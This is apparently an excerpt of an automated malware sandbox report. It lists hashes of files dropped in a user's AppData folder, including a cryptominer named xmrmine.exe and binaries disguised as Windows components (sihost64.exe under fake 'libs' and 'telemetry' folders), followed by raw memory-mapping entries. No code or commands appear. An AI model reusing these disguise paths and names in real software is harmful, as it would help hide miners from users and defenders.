C:\Users\Admin\AppData\Roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\AppData\Roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
C:\Users\Admin\appdata\roaming\microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
C:\Users\Admin\appdata\roaming\microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
C:\Users\Admin\appdata\roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
C:\Users\Admin\appdata\roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
\Users\Admin\AppData\Roaming\Microsoft\libs\sihost64.exeMD5
f20a5085dbb85927b25ed46a45fe0a13
SHA141b351e45a7be1d6c6c6918ee65b00f5d69ff787
SHA256370f698a696bd33c167348773c954d3b079ee719d91f7fa10c47e96bd647a235
SHA5124cba09f695db44f05c46511f4ca5a6d2d670f83b93793cfeb09e4112986eff44787061832993aa2dc69ef967327e63a09d4675a1e3dd1433f9ad30391158bc3f
-
\Users\Admin\AppData\Roaming\Microsoft\telemetry\sihost32.exeMD5
e149663730c0b03c8936baffe9645bb4
SHA1c0fb146c35d48481df4149027953e4ab7be59e95
SHA25633225a857521c55b3456fa11dad3568911c30bc74d408eba8b3f61a2b4118469
SHA512553078b3bb9bab56d3f4df890f798118d4a3ec0d83550c1d9ac20df02ab4a4672fc0cc8ec170de56336679a81f7a0809c1a2de5cedfcddf916ed5768f2275abe
-
\Users\Admin\AppData\Roaming\etcmin.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
\Users\Admin\AppData\Roaming\rtksmbs.exeMD5
406f2550d0d4b9b3e2f47994076e8b8b
SHA101ab414c9d14ef6a10cd1f3c815e2d63ace18822
SHA2564805d0ba5ffb8546fa50acc17332b9582df9b5a067db9ac867723f4db0de4ae0
SHA51273b20eb53172950295b6d3756482cdadb26ec5d0f497e0bc325986f53469f8022405b8789ff7f7624f71a72b20de82571bd45944eb4ab5a34912578d7f05e1d4
-
\Users\Admin\AppData\Roaming\serverpatch.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
\Users\Admin\AppData\Roaming\xmrmine.exeMD5
973037113a1f50e0ca79d3cc42a5ef66
SHA178235c164ebfa47d613a100abf5c64bed10c1036
SHA256a5decfb1b6c768e361391a8434746026e811683c64ac2c399765999fab1c936c
SHA512d9c41cf4606e971bab34fb0153320111ddd4c92f7b2d729aff583a378045dcd1566b83b2724b65a11ae6c5a5cb4ad35d815eea1e3ce14ef2ce7250b0bf90aa32
-
memory/432-76-0x0000000000000000-mapping.dmp
-
memory/512-96-0x0000000000000000-mapping.dmp
-
memory/780-80-0x0000000000000000-mapping.dmp
-
memory/812-107-0x0000000000000000-mapping.dmp
-
memory/1004-109-0x000000013F810000-0x000000013F811000-memory.dmpFilesize
4KB
-
memory/1004-114-0x0000000002420000-0x0000000002422000-memory.dmpFilesize
8KB
-
memory/1004-105-0x0000000000000000-mapping.dmp
-
memory/1060-75-0x0000000000000000-mapping.dmp
-
memory/1128-70-0x000000013F2A0000-0x000000013F2A1000-memory.dmpFilesize
4KB
-
memory/1128-65-0x0000000000000000-mapping.dmp
-
memory/1128-73-0x00000000005D0000-0x00000000005D6000-memory.dmpFilesize
24KB
-
memory/1128-78-0x000000001CA90000-0x000000001CA92000-memory.dmpFilesize
8KB
-
memory/1156-102-0x0000000000000000-mapping.dmp
-
memory/1200-95-0x0000000000000000-mapping.dmp
-
memory/1256-119-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1256-122-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/1256-121-0x0000000000070000-0x0000000000090000-memory.dmpFilesize
128KB
-
memory/1256-123-0x00000000001C0000-0x00000000001E0000-memory.dmpFilesize
128KB
-
memory/1256-124-0x00000000001C0000-0x00000000001E0000-memory.dmpFilesize
128KB
-
memory/1256-120-0x00000001402EB66C-mapping.dmp
-
memory/1256-125-0x00000000001F0000-0x0000000000210000-memory.dmpFilesize
128KB
-
memory/1320-79-0x000000001CA00000-0x000000001CA02000-memory.dmpFilesize
8KB
-
memory/1320-62-0x0000000000000000-mapping.dmp
-
memory/1320-74-0x0000000000160000-0x0000000000169000-memory.dmpFilesize
36KB
-
memory/1320-69-0x000000013F3A0000-0x000000013F3A1000-memory.dmpFilesize
4KB
-
memory/1460-77-0x0000000000000000-mapping.dmp
-
memory/1744-82-0x0000000000000000-mapping.dmp
-
memory/1744-111-0x000000001B2F0000-0x000000001B2F2000-memory.dmpFilesize
8KB
-
memory/1744-87-0x000000013FE80000-0x000000013FE81000-memory.dmpFilesize
4KB
-
memory/1820-60-0x0000000076641000-0x0000000076643000-memory.dmpFilesize
8KB
-
memory/1940-112-0x000000001CA10000-0x000000001CA12000-memory.dmpFilesize
8KB
-
memory/1940-85-0x0000000000000000-mapping.dmp
-
memory/1940-91-0x000000013FB90000-0x000000013FB91000-memory.dmpFilesize
4KB
-
memory/2008-113-0x000000001BE10000-0x000000001BE12000-memory.dmpFilesize
8KB
-
memory/2008-98-0x0000000000000000-mapping.dmp
-
memory/2008-101-0x000000013FA10000-0x000000013FA11000-memory.dmpFilesize
4KB